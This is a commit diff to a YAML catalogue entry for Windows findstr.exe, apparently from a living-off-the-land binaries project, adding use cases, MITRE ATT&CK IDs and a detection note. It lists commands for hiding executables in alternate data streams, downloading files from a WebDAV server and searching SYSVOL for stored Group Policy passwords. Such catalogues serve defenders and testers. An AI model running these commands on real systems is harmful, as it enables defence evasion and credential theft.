Changed all OSBinaries according to the new template

yml/OSBinaries/Findstr.yml

@@ -1,23 +1,52 @@
 ---
 Name: Findstr.exe
-Description: Add ADS, Search
-Author: ''
+Description: 
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
-    Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.'
+    Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
+    Usecase: Add a file to an alternate data stream to hide from defensive counter measures
+    Category: Alternate data streams
+    Privileges: User
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
-    Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.'
-  - Command: findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
-    Description: 'Search for stored password in Group Policy files stored on SYSVOL.'
+    Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
+    Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
+    Category: Alternate data streams
+    Privileges: User
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: findstr /S /I cpassword \\sysvol\policies\*.xml
+    Description: Search for stored password in Group Policy files stored on SYSVOL.
+    Usecase: Find credentials stored in cpassword attrbute
+    Category: Credentials
+    Privileges: User
+    MitreID: T1081
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1081
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
+    Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file.
+    Usecase: Download/Copy file from webdav server
+    Category: Download
+    Privileges: User
+    MitreID: T1185
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1185
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full Path:
-  - c:\windows\system32\findstr.exe
-  - c:\windows\sysWOW64\findstr.exe
-Code Sample: []
-Detection: []
+  - Path: C:\Windows\System32\findstr.exe
+  - Path: C:\Windows\SysWOW64\findstr.exe
+Code Sample: 
+- Code:
+Detection:
+ - IOC: finstr.exe should normally not be invoked on a client system
 Resources:
-  - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
-  - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
-Notes: Thanks to Oddvar Moe - @oddvarmoe
-
+  - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+Acknowledgement:
+  - Person: Oddvar Moe
+    Handle: '@oddvarmoe'
+---